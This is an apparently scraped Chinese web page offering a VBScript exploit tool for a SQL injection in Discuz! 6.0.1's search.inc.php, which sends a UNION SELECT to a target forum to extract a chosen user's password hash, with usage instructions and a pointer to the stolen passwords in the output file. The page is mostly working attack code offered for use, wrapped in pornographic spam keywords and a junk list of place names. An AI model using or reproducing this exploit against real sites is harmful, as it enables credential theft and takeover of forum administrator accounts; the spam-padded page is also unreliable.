最新国产好看的视频,伊人天堂AV在线,国产Aaaaaa视频,蜜臀视频在线观看一区,人妻av色图,密臀久久久精品影片,青青视频免费观看毛片,久草在线观看视,国产三级精品色情在线

discuz獲取任意管理員密碼漏洞利用工具vbs版

  發(fā)布時間:2009-04-18 13:51:46   作者:佚名   我要評論
以下是search.inc.php 文件漏洞利用代碼VBS版 [code] Dim strUrl,strSite,strPath,strUid showB() Set Args = Wscript.Arguments If Args.Count <> 3 Then ShowU() Else strSite=Args(0) strPath=Args(1) strUid=Args(2) End If strUrl="action=searc
以下是search.inc.php 文件漏洞利用代碼VBS版

復(fù)制代碼
代碼如下:

Dim strUrl,strSite,strPath,strUid
showB()
Set Args = Wscript.Arguments
If Args.Count <> 3 Then
ShowU()
Else
strSite=Args(0)
strPath=Args(1)
strUid=Args(2)
End If
strUrl="action=search&searchid=22%cf' UNION SELECT 1,password,3,password/**/from/**/cdb_members/**/where/**/uid=" & strUid &"/*&do=submit"
Set objXML = CreateObject("Microsoft.XMLHTTP")
objXML.Open "POST",strSite & strPath & "index.php", False
objXML.SetRequestHeader "Accept", "*/*"
objXML.SetRequestHeader "Accept-Language", "zh-cn"
objXML.SetRequestHeader "Content-Type", "application/x-www-form-urlencoded"
objXML.SetRequestHeader "User-Agent", "wap"
objXML.send(strUrl)
wscript.echo(objXML.ResponseText)
Sub showB()
With Wscript
.Echo("+--------------------------=====================------------------------------+")
.Echo("Exploit discuz6.0.1")
.Echo("Code By Safe3")
.Echo("+--------------------------=====================------------------------------+")
End with
End Sub
Sub showU()
With Wscript
.Echo("+--------------------------=====================------------------------------+")
.Echo("用法:")
.Echo(" cscript "&.ScriptName&" site path uid")
.Echo("例子:")
.Echo(" cscript "&.ScriptName&" http://www.example.com/ /forum/ 1 >result.txt")
.Echo("+--------------------------=====================------------------------------+")
.Quit
End with
End Sub
 
獲得的密碼大家自己在result.txt中查找

相關(guān)文章

最新評論

新巴尔虎左旗| 永川市| 石狮市| 娄烦县| 德格县| 会理县| 清河县| 安化县| 岳普湖县| 江口县| 吴桥县| 楚雄市| 库车县| 庆云县| 东海县| 交城县| 清水河县| 汾阳市| 自治县| 昌平区| 五指山市| 界首市| 密云县| 仙桃市| 通城县| 孟村| 昌都县| 洪湖市| 青浦区| 道孚县| 宽甸| 鄯善县| 景宁| 大丰市| 微山县| 潞城市| 乐昌市| 慈溪市| 浦江县| 兴化市| 泰和县|